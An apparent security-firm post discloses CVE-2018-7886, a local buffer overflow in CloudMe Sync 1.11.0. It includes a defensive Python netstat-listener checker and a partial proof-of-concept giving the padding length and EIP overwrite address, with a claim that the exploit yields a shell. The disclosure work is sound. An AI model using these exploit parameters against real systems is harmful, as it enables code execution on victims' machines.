CVE-2018-7886 : CloudMe Sync 1.11.0 – Local Buffer Overflow
CVE-2018-7886 was discovered by ICSS team member Prasenjit Kanti Paul, who is the Co-Founder of Indian Cyber Security Solutions. The exploit was published on Exploit DB on 16-04-2018. It’s an achievement for Indian Cyber Security Solutions. The exploit details are as follows:
Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
Date: 08-03-2018
CVE: CVE-2018-7886
Author: Prasenjit Kanti Paul
Overview:
The previous version, CloudMe Sync 1.10.9, has an RCE vulnerability [CVE-2018-6892] on TCP port 8888, which can be accessed remotely. Any unauthenticated remote user could cause a buffer overflow on port 8888 and execute arbitrary code on the victim’s system.
To prevent the RCE in CloudMe Sync 1.10.9, CloudMe Sync 1.11.0 restricts TCP port 8888 to local use (127.0.0.1), so only localhost can use this port. This exploit is therefore a local exploit.
This vulnerability exists because of an incomplete fix for CVE-2018-6892.
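The bind-address change described above can be checked on a host. The following is an added example, not part of the original advisory or of CloudMe's code: it classifies TCP listeners on port 8888 from `netstat -ano` output as loopback-only or network-reachable. The sample output, PIDs and function names are constructed for illustration.

```python
import ipaddress

PORT = 8888  # TCP port the advisory names for CloudMe Sync

# Constructed sample of Windows `netstat -ano` output (not captured from a real host).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2404
  TCP    0.0.0.0:8888           0.0.0.0:0              LISTENING       3120
  TCP    192.168.1.20:49231     203.0.113.5:443        ESTABLISHED     2404
  TCP    [::1]:8888             [::]:0                 LISTENING       2404
  UDP    0.0.0.0:8888           *:*                                    990
"""


def split_endpoint(endpoint):
    """Split 'addr:port' or '[v6addr]:port' into (ip_address, port)."""
    host, _, port = endpoint.rpartition(":")
    return ipaddress.ip_address(host.strip("[]")), int(port)


def classify_listeners(netstat_text, port=PORT):
    """Return (pid, address, exposure) for each TCP listener on `port`."""
    findings = []
    for line in netstat_text.splitlines():
        fields = line.split()
        # A TCP row has five fields: proto, local, foreign, state, pid.
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        try:
            addr, local_port = split_endpoint(fields[1])
        except ValueError:
            continue  # header or malformed row; skip it
        if local_port != port:
            continue
        # Loopback bind: only local processes can connect (the 1.11.0 behaviour).
        # Any other bind: reachable from the network (the 1.10.9 behaviour).
        exposure = "local-only" if addr.is_loopback else "network-reachable"
        findings.append((int(fields[4]), str(addr), exposure))
    return findings


if __name__ == "__main__":
    for pid, addr, exposure in classify_listeners(SAMPLE_NETSTAT):
        print(f"pid={pid} bind={addr} port={PORT} exposure={exposure}")
```

A "local-only" result removes the remote path only: any process on the same machine can still reach the listener, which is why the advisory calls the fix incomplete.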
Proof Of Concept
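Run this file on the victim’s Windows 7 SP1 x86 system where CloudMe Sync 1.11.0 has been installed.
import socket
# CloudMe Sync 1.11.0 listens on TCP port 8888 on localhost only
target="127.0.0.1"
# Padding bytes
junk="A"*1052
# EIP overwrite value
eip="\x7B\x8A\xA9\x68"
After running this PoC on the victim’s system, the attacker’s system got the shell.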